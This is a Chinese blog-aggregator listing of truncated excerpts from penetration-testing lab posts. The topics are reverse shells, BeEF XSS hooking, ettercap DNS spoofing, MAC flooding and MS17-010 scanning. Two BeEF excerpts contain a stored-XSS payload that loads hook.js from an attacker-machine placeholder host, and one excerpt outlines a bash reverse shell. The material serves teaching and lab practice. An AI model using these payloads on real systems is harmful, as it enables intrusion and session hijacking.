反弹shell 1.bash反弹 攻击机监听端口 -n: 不反向解析dns,即不通过ip解析域名 no dns -v: 详细信息输出 verbose -l: 监听 listen -p: 指定端口 port 靶机执行shell命令 bash -i:交互式shell >& :输入输出重定向:0 stdi ...
分类:
系统相关 时间:
2019-07-29 19:02:53
阅读次数:
333
一、环境搭建。 1)wget http://download.redis.io/releases/redis-5.0.0.tar.gz tar xzf redis-5.0.0.tar.gz cd redis-5.0.0 make 2)不同机器上需更改redis.conf配置文件 protected- ...
分类:
其他好文 时间:
2019-07-11 20:33:50
阅读次数:
95
任务环境说明: 攻击机: 物理机:Windows7 物理机安装工具1:Microsoft Visual Studio 2008 物理机安装工具2:OllyICE 虚拟机1:Ubuntu_Linux 虚拟机1安装工具1:Python3/Python2 虚拟机1安装工具2:GCC 虚拟机1安装工具3:G ...
分类:
系统相关 时间:
2019-07-02 19:11:02
阅读次数:
421
KALI中启动BEEFXSS PAYLOAD为 <script src=”http://攻击机IP:3000/hook.js”></script> 将攻击代码插入到存储型XSS中 受害者访问存储型XSS界面,可以看到受害者不停地与攻击机进行通信 可以执行非常多的功能 2.BruteXSS 地址: h ...
分类:
其他好文 时间:
2019-06-09 00:20:07
阅读次数:
288
攻击机:192.168.32.152 靶机 :192.168.32.155 打开靶机 nmap一下 我们看到了开放了 ssh,smb,mysql这些端口,还有一个大端口 对smb服务我们可以1.使用空口令,弱口令尝试,查看敏感文件 -- smbclient -L IP-- smbclient '\\ ...
分类:
其他好文 时间:
2019-06-07 12:59:24
阅读次数:
112
实验环境 Windows本机 Windows下虚拟机中(网络源均设置为共享网络模式): Kali Linux - 64bit(攻击机,IP为192.168.80.130) Windows 7 - 64bit(靶机,IP为192.168.80.145) Windows 10- 64bit(靶机,IP为 ...
分类:
其他好文 时间:
2019-05-04 00:54:05
阅读次数:
188
1.BEEF KALI中启动BEEFXSS PAYLOAD为 <script src=”http://攻击机IP:3000/hook.js”></script> 将攻击代码插入到存储型XSS中 受害者访问存储型XSS界面,可以看到受害者不停地与攻击机进行通信 可以执行非常多的功能 2.BruteXS ...
分类:
其他好文 时间:
2019-04-27 21:23:04
阅读次数:
182
MAC泛洪是攻击机不停发出不同源MAC的ICMP包,耗尽交换机的MAC表,这时交换机与正常的主机通信时,就会发送广播报文,局域网内的机器都会收到报文,对报文进行分析,就可得到通信者的信息. 1.靶机 kali(攻击机) windows7(ftp服务器) windows2003(客户机) 2.kali ...
分类:
系统相关 时间:
2019-03-13 18:10:46
阅读次数:
198
ettercap在局域网中的应用 dns欺骗 攻击机:kali linux ,ip地址:192.168.174.128 靶场机器:windows7,ip地址: 192.168.174.129 配置ettercap 使用工具ettercap,配置/etc/ettercap/etter.dns文件中投毒 ...
分类:
其他好文 时间:
2019-03-03 18:59:25
阅读次数:
212
攻击机:192.168.148.132 kali linux2018.2 x64 靶机:192.168.1.129 win7 x64 首先用msfconsole的smb模块扫描,看看是否有漏洞 use auxiliary/scanner/smb/smb_ms17_010 set rhosts 192 ...
分类:
其他好文 时间:
2019-02-10 09:18:06
阅读次数:
215